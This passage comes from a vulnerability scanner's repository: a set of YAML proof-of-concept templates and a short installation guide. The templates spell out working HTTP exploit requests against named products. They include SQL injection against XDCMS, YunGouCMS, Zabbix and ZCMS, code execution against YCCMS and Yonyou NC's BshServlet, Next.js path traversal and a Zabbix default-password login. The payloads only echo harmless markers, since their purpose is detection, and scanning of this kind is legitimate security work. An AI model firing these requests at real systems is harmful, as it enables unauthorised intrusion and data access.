-------------------------------------------------------------------------------- 1 | name: poc-yaml-xdcms-sql 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /index.php?m=member&f=login_save 13 | body: | 14 | username=dd' or extractvalue(0x0a,concat(0x0a,{{r1}}*{{r2}}))#&password=dd&submit=+%B5%C7+%C2%BC+ 15 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 16 | expression: r0() 17 | detail: 18 | author: amos1 19 | links: 20 | - https://www.uedbox.com/post/35188/ 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 2 | manual: true 3 
| transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /install/ 10 | headers: 11 | Accept-Encoding: deflate 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 14 | expression: r0() 15 | detail: 16 | author: 清风明月(www.secbook.info) 17 | links: 18 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 19 | influence_version: =< Xiuno BBS 4.0.4 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | r1: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /admin/?a=Factory();print({{r}}%2b{{r1}});//../ 13 | expression: response.body.bcontains(bytes(string(r + r1))) 14 | expression: r0() 15 | detail: 16 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 17 | links: 18 | - https://blog.csdn.net/qq_36374896/article/details/84839891 19 | yccms: v3.3 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yonyou-nc-bsh-servlet-bshservlet-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(8000, 9999) 6 | r2: randomInt(8000, 9999) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /servlet/~ic/bsh.servlet.BshServlet 13 | body: bsh.script=print%28{{r1}}*{{r2}}%29%3B 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 15 | expression: r0() 16 | detail: 17 | author: B1anda0(https://github.com/B1anda0) 18 | 
links: 19 | - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://www.secquan.org/Prime/1069179 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-authentication-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-authentication-bypass 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /zabbix.php?action=dashboard.view&dashboardid=1 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://www.exploit-db.com/exploits/47467 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-cve-2016-10134-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-cve-2016-10134-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(2000000000, 
2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) 14 | expression: r0() 15 | detail: 16 | author: sharecast 17 | links: 18 | - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zabbix-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /index.php 10 | body: name=Admin&password=zabbix&autologin=1&enter=Sign+in 11 | expression: response.status == 302 && response.headers["location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session") 12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zcms-v3-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zcms-v3-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e") 12 | expression: r0() 13 | detail: 14 | author: 
MaxSecurity(https://github.com/MaxSecurity) 15 | links: 16 | - https://www.anquanke.com/post/id/183241 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/zeit-nodejs-cve-2020-5284-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_next/static/../server/pages-manifest.json 10 | expression: 'response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)' 11 | expression: r0() 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728 16 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284 17 | -------------------------------------------------------------------------------- /static/Installation.md: -------------------------------------------------------------------------------- 1 | # 编译 2 | 3 | ```sh 4 | sudo apt install -y libpcap-dev golang git 5 | git clone https://github.com/veo/vscan.git 6 | cd vscan 7 | go build 8 | ``` 9 | 10 | # 安装/运行 11 | 12 | 1.在运行vscan之前,你必须先安装libpcap库 13 | 14 | ```sh 15 | sudo apt install -y libpcap-dev 16 | ``` 17 | 18 | 2.前往 19 | [https://github.com/veo/vscan/releases/](https://github.com/veo/vscan/releases/) 20 | 下载vscan最新版运行: 21 | 22 | ## 运行时动态库版本问题 23 | 24 | 如果你运行的时候出现了`libpcap.so.0.8: cannot open shared object file: No such file or directory`的错误 25 | 26 | 请先检查libpcap库是否已经正常安装。 27 | ```sh 28 | ls -all /lib64/libpcap* 29 | ``` 30 | 如果系统中安装的是其他版本的libpcap库,可以创建一个名为/lib64/libpcap.so.0.8的软链接,指向已安装的版本(下面命令中的1.9.1仅为示例,请替换为上面ls命令实际列出的版本;写入/lib64通常需要root权限),程序即可正常运行 31 | 32 | ```sh 33 | ln -s /lib64/libpcap.so.1.9.1 /lib64/libpcap.so.0.8 34 | ``` -------------------------------------------------------------------------------- /static/logo.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/logo.png -------------------------------------------------------------------------------- /static/starfile.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/starfile.jpeg -------------------------------------------------------------------------------- /static/vscan-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/veo/vscan/1beb10c08e377e15b7dd417be1843bb75aa8c4f0/static/vscan-run.png --------------------------------------------------------------------------------